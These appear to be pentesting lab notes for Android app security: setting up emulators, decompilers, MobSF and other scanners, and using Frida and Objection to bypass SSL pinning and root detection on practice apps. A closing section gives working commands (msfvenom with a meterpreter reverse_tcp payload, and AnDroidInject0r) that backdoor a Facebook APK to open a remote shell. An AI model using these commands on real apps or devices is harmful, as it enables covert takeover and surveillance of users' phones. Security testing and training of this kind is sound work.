1 - Preparing Our Emulation Environment: Android

This document provides instructions for setting up an emulation environment for Android application testing. It discusses installing Android Studio, Anbox, Genymotion and other emulation tools. It also summarizes steps for decompiling APK files, performing static and dynamic analysis using tools like MobSF, Frida and Objection, and demonstrates how to inject backdoors into unprotected APK files.
Android

1 - Preparing our emulation environment

Android Studio
https://developer.android.com/studio?hl=es-419&gclsrc=ds&gclsrc=ds
tar xvf android-studio-2020.3.1.24-linux.tar.gz
cd android-studio/bin
./studio.sh

Anbox
sudo apt update
sudo apt install snapd
sudo snap install --beta --devmode anbox
sudo ln -s /snap/bin/anbox /usr/bin/anbox
anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity

sudo apt install adb


adb devices

emulator-5558 device

Genymotion
wget https://dl.genymotion.com/releases/genymotion-3.2.1/genymotion-3.2.1-linux_x64.bin
chmod +x genymotion-3.2.1-linux_x64.bin
./genymotion-3.2.1-linux_x64.bin

We create an example device: Huawei P30

adb
sudo apt install adb

Verify the emulated Android devices.

adb devices

Install an APK remotely.


adb install Escritorio/watf-bank.apk

adb shell
cd /mnt/user/0/primary/Download
wget http://192.168.100.6/cacert.der

Fix internet: https://titanwolf.org/Network/Articles/Article?AID=52bd816e-e5f2-4607-971f-639e51e23b20#gsc.tab=0

2 - Decompiling APK source code:


sudo apt install

1) apktool d example.apk

2) cp example.apk example.zip

classes.dex: This file contains the Java code, which will be interpreted by the Android virtual machine (Dalvik).
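
The two steps above expose the APK as an ordinary ZIP archive with classes.dex inside. As an added example (not part of the original document), this Python code lists the classes*.dex entries of an APK and checks each DEX header's size, Adler-32 checksum and SHA-1 signature fields; the function names and the in-memory sample APK are constructed for illustration.

```python
import hashlib, io, re, struct, zipfile, zlib

DEX_NAME = re.compile(r"classes\d*\.dex")  # classes.dex, classes2.dex, ...

def parse_dex_header(data):
    """Decode the fixed 0x70-byte DEX header and verify its integrity fields."""
    if len(data) < 0x70 or data[:4] != b"dex\n" or data[7:8] != b"\x00":
        raise ValueError("not a DEX file")
    (checksum,) = struct.unpack_from("<I", data, 8)
    file_size, header_size, endian_tag = struct.unpack_from("<3I", data, 32)
    return {
        "version": data[4:7].decode("ascii"),
        "header_size": header_size,
        "little_endian": endian_tag == 0x12345678,
        "file_size_ok": file_size == len(data),
        # Adler-32 covers everything after the checksum field itself.
        "checksum_ok": checksum == zlib.adler32(data[12:]),
        # SHA-1 covers everything after the 20-byte signature field.
        "sha1_ok": data[12:32] == hashlib.sha1(data[32:]).digest(),
        "strings": struct.unpack_from("<I", data, 56)[0],
        "methods": struct.unpack_from("<I", data, 88)[0],
        "classes": struct.unpack_from("<I", data, 96)[0],
    }

def inspect_apk(apk):
    """apk is a path or file object; returns {entry name: header info}."""
    with zipfile.ZipFile(apk) as z:
        names = sorted(n for n in z.namelist() if DEX_NAME.fullmatch(n))
        return {n: parse_dex_header(z.read(n)) for n in names}

def build_sample_apk(tamper=False):
    """Constructed sample: a ZIP holding one header-only DEX with no code."""
    body = struct.pack("<3I", 0x70, 0x70, 0x12345678) + bytes(68)
    sig = hashlib.sha1(body).digest()
    head = b"dex\n035\x00" + struct.pack("<I", zlib.adler32(sig + body))
    dex = bytearray(head + sig + body)
    if tamper:
        dex[-1] ^= 0x01  # change one byte without recomputing the header
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"")
        z.writestr("classes.dex", bytes(dex))
    return buf

if __name__ == "__main__":
    for label, apk in (("intact", build_sample_apk()), ("tampered", build_sample_apk(True))):
        for name, info in inspect_apk(apk).items():
            print(label, name, info)
```

To inspect a real file, call inspect_apk("example.apk"). A DEX rebuilt by a tool such as apktool carries freshly computed header values, so these fields flag corruption or in-place patching, not repackaging.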

GUI decompilers

Jadx-GUI
sudo apt install jadx

Ghidra
sudo apt install ghidra

3 - SAST and DAST ANALYSIS TOOLS


Mobile-Security-Framework-MobSF

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git


cd Mobile-Security-Framework-MobSF
sudo apt install wkhtmltopdf
sudo apt-get install python3-pip
sudo pip3 install -r requirements.txt
sudo apt-get install python3-venv
sudo ./setup.sh

cd mobsf/MobSF
adb devices

nano settings.py
ADB_BINARY = '/usr/lib/android-sdk/platform-tools/adb'
ANALYZER_IDENTIFIER = '192.168.56.101:5555'
cd Android/Mobile-Security-Framework-MobSF
sudo ./run.sh

RMS-Runtime-Mobile-Security
git clone https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security
sudo apt install npm
npm install -g rms-runtime-mobile-security
rms
http://127.0.0.1:5000/

aparoid

sudo apt-get install python3 python3-pip sqlite3 default-jre android-tools-adb gunicorn libmagic1
git clone https://github.com/stefan2200/aparoid
cd aparoid
python3 -m pip install --upgrade -r requirements.txt
./start.sh
http://0.0.0.0:7300/

Insider

Download the release from https://github.com/insidersec/insider/releases/tag/3.0.0


./insider -tech java -target ~/Android/watf-bank/ -security 20

Semgrep

python3 -m pip install semgrep


git clone https://github.com/returntocorp/semgrep-rules.git

Scan with rules locally


semgrep --config=/home/hernan/Web/Vulnerabilidades/SAST/semgrep-rules ~/Android/watf-bank/

Scan with rules online


semgrep --config="p/owasp-top-ten" ~/Android/watf-bank/

4 - Pentesting with Frida and Objection

Frida
sudo pip3 install frida frida-tools

Verify the processes on the Android device


frida-ps -U

Download frida-server:

frida-server-15.1.3-android-x86.xz
frida-server-15.1.3-android-x86_64.xz

Push the binary to the Android device, make it executable and run it.

adb push frida-server-15.1.3-android-x86 /data/local/tmp


adb shell chmod 777 /data/local/tmp/frida-server-15.1.3-android-x86
adb shell /data/local/tmp/frida-server-15.1.3-android-x86 &

Next, we export the Burp Suite CA certificate on our local machine and push it to the Android device.

adb push cacert.der /data/local/tmp/cert-der.crt

Next, we download this script, which performs an SSL pinning bypass, and send it to the Android device.

https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

We run the bypass:

frida -U -f owasp.sat.agoat -l fridascript.js --no-pause

How to create symbolic links for the Frida scripts

sudo ln -s /home/hernan/.local/bin/* /usr/bin/

JS scripts

ls /home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default
ls /home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/auxiliary
ls /home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/others

Bypass Android Root Detection

frida -l '/home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default/root_bypass.js' -U -f com.WaTF.WaTFBank --no-pause

frida -l '/home/hernan/Android/Mobile-Security-Framework-MobSF/mobsf/DynamicAnalyzer/tools/frida_scripts/default/ssl_pinning_bypass.js' -U -f com.WaTF.WaTFBank --no-pause

Objection

Bypass SSLPinning:
objection --gadget owasp.sat.agoat explore
android sslpinning disable

5 - Reverse engineering: implementing a backdoor in an unprotected APK

Inject a backdoor into an APK.

AnDroidInject0r

git clone https://github.com/yasserjanah/AnDroidInject0r.git


cd AnDroidInject0r/
chmod +x install_requirements.sh
./install_requirements.sh
python3 ./AndroidInject0r.py --apkfile facebook.apk
python3 ./AndroidInject0r.py --apkfile facebook.apk lhost=192.168.100.3 lport=4444

Inject backdoor msfvenom

sudo apt install zipalign


sudo apt install apksigner
msfvenom -x facebook.apk -p android/meterpreter/reverse_tcp lhost=192.168.100.3 lport=4444 -o test.apk
